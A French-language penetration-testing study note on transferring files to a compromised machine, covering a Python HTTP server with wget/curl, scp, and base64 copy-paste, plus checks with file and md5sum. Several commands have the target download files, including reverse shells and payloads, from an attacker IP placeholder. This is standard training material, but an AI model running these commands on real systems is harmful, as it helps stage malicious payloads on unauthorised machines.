Transferring Files -- FR

📌 Introduction

Dans le cadre d’un test d’intrusion, il est fréquent de devoir transférer des fichiers vers ou depuis la machine cible. Ces fichiers peuvent être :

Des scripts d’énumération (comme linpeas.sh)
Des exploits locaux
Des reverse shells ou payloads personnalisés
Des fichiers de configuration, des résultats, voire des flags.

Quand on dispose d’un shell interactif complet (ex. SSH), cela ne pose pas de difficulté. En revanche, lorsqu’on obtient un shell limité (reverse shell, web shell…), on doit souvent ruser pour transférer les fichiers.

Voici les principales méthodes que j’ai étudiées et que je peux appliquer selon la situation.

🌐 Méthode 1 — Serveur HTTP Python + `wget` ou `curl`

C’est l’approche que j’utilise le plus souvent. Elle consiste à héberger le fichier sur ma machine attaquante via un petit serveur HTTP, puis à le télécharger depuis la machine cible.

📌 Étapes

Côté attaquant :

Je me place dans le répertoire contenant le fichier à transférer, puis je lance :

python3 -m http.server 8000

Cela met en place un serveur HTTP sur le port 8000.

Côté cible :

Si wget est disponible :
```
wget http://<MON_IP>:8000/fichier
```
Si curl est utilisé :
```
curl http://<MON_IP>:8000/fichier -o fichier
```
⚠️ Cette méthode suppose que la cible a accès à Internet (ou au moins à ma machine via l’IP VPN).

🔐 Méthode 2 — `scp` (copie via SSH)

Si j’ai des identifiants valides SSH sur la machine cible, je peux envoyer un fichier directement via la commande scp :

scp fichier user@ip_cible:/tmp/fichier

Je l’utilise surtout lorsque je suis dans un contexte de post-exploitation et que l'accès SSH est disponible.

🧬 Méthode 3 — Encodage en Base64

Certaines machines ne disposent pas de wget, curl, ou ne peuvent pas sortir vers Internet. Dans ce cas, je peux encoder mon fichier en base64, copier/coller la sortie dans le shell distant, puis le décoder.

📌 Étapes

Sur ma machine :

base64 shell -w 0

Je copie ensuite la chaîne générée.

Sur la cible :

echo "<sortie_base64>" | base64 -d > shell
chmod +x shell

🧠 Cette méthode fonctionne même dans les contextes très restreints, bien qu’elle soit plus lente et fastidieuse.

✅ Vérification de l’intégrité

a. Vérification du format :

file shell

Permet de confirmer que le binaire est valide (ex. ELF 64-bit).

b. Vérification par hash MD5 :

Je compare le hash du fichier original et du fichier transféré :

md5sum shell

Les deux valeurs doivent être identiques.

🔎 Synthèse

Méthode

Contexte idéal

Avantages

Inconvénients

Python HTTP Server

Shell reverse, machine sortante

Rapide, simple

Nécessite accès réseau sortant

SCP

Accès SSH disponible

Sécurisé, direct

Nécessite mot de passe ou clé

Base64

Aucun outil réseau disponible

Fonctionne même en environnement très restreint

Long, fastidieux

🧠 Ce qu’il faut retenir

Le transfert de fichiers est une compétence fondamentale en post-exploitation. La méthode utilisée dépend du contexte réseau, des outils disponibles et des permissions sur la machine cible. Dans tous les cas, il est crucial de pouvoir s’adapter et de connaître plusieurs techniques pour pallier les restrictions rencontrées.

Last updated 22 days ago

hashtag📌 Introduction

hashtag🌐 Méthode 1 — Serveur HTTP Python + wget ou curl

hashtag📌 Étapes

hashtag🔐 Méthode 2 — scp (copie via SSH)

hashtag🧬 Méthode 3 — Encodage en Base64

hashtag📌 Étapes

hashtag✅ Vérification de l’intégrité

hashtaga. Vérification du format :

hashtagb. Vérification par hash MD5 :

hashtag🔎 Synthèse

hashtag🧠 Ce qu’il faut retenir

📌 Introduction

🌐 Méthode 1 — Serveur HTTP Python + `wget` ou `curl`

📌 Étapes

🔐 Méthode 2 — `scp` (copie via SSH)

🧬 Méthode 3 — Encodage en Base64

📌 Étapes

✅ Vérification de l’intégrité

a. Vérification du format :

b. Vérification par hash MD5 :

🔎 Synthèse

🧠 Ce qu’il faut retenir